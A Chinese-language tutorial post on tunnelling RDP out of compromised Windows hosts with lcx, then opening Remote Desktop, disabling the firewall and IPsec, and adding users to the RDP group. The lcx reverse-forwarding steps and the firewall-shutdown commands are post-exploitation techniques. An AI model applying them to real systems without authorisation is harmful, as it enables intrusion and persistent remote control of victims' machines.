lcx端口转发及远程终端问题

lcx端口转发及远程终端问题

一、lcx端口转发

1、描述

lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口。它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入侵工具,lcx在内网入侵渗透中起着重要的角色。lcx进行端口转发的原理就是使不同端口之间形成一个回路。它常用于外网连接内网3389端口。

2、lcx命令
[option:] 
-listen <ConnectPort> <TransmitPort>                                  连接端口  转发端口
-tran <ConnectPort> <TransmitHost> <TransmitPort>                     连接端口  转发主机  转发端口
-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>      连接主机  连接端口  转发主机  转发端口
3、本地转发
  • 肉鸡(把自己的3389端口转给自己的3390端口)
lcx -tran 3390 127.0.0.1 3389
  • 控制端连接
mstsc
连接目标ip:3390
4、远程转发

肉鸡主动向外连接,绕过防火墙

  • 肉鸡(将自己的3389端口转给远程主机的8888端口)
lcx -slave 远程ip 8888 127.0.0.1 3389
  • 远程主机(远程主机监听自己的8888端口转发给自己的9999端口)
lcx -listen 9999 8888
  • 控制端
mstsc
远程ip:9999

二、远程终端问题集合

1、描述

远程终端的默认端口是3389,一般云服务器会开启,在较高的权限下可以使用注册表命令开启远程终端服务。

2、服务必须开启

必须确保远程终端的服务首先是开启的

#查询Remote Desktop Services服务
net start |find "Remote Desktop Services" 

#如果没有开启的话,手动开启
net start "Remote Desktop Services"
3、注册表开启远程终端
  • 2008 2012 2016
echo DO ALL IN CMD! 
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t
REG_DWORD /d 0 /f 
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f 
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
4、msf开启
run getgui -e
5、一条命令开启
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
6、WMIC命令开启3389端口

**前提:**前提条件是确保“Windows Management Instrumentation(Winmgmt)”服务已正常启动。

**范围:**Win2k3/Win7/Win2k8/Win8.1/Win10/2012/2016(1:ON、0:OFF)

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
7、各种关于远程终端的查询
  • 查询是否开启远程终端(0为on 1为off)
REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
  • 注册表查询远程终端开启的端口号
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\
#查看PortNumber字段
REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds" /s
REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP- Tcp" /v PortNumber 
set /a Port=0xd3d   (查询出来后转为整数结果为3389)
  • 通过网络命令查询端口
tasklist /svc | findstr "TermService"    #查询服务进程号
netstat -ano | findstr "进程号"           #根据服务的进程号查询端口
8、关于防火墙导致的问题

确定开启了远程终端并且端口没错的情况下 还是连不上目标 目标上的防火墙可能允许,这个时候可以使用lcx端口转发,或者使用命令关闭防火墙

#查询状态
netsh advfirewall show allprofile state    
#关闭防火墙
netsh advfirewall set allprofiles state off 
#关闭防火墙服务
net stop "Windows Firewall" 
#禁用防火墙
sc config sharedaccess start= disabled 
#关闭防火墙
net stop sharedaccess 
6、关闭 ipsec

在关闭防火墙时,还是连接不上,可能是ipsec做了ip策略处理,导致连接失败可以使用命令

net stop "IPsec Policy Agent"
7、远程桌面连接错误(身份验证错误,函数不受支持)
  • 可以使用相同版本的终端进行连接
  • 或者使用 xfreerdp连接会自动加密
sudo apt install freerdp2-x11 
xfreerdp /f /u:administrator /p:123456 /v:192.168.0.118
8、加入远程桌面组
net localgroup "Remote Desktop Users" darkid /add
9、超出最大连接数
  • 使用以下命令解决
mstsc /v:ip:3389 /console

你可能感兴趣的:(网络安全)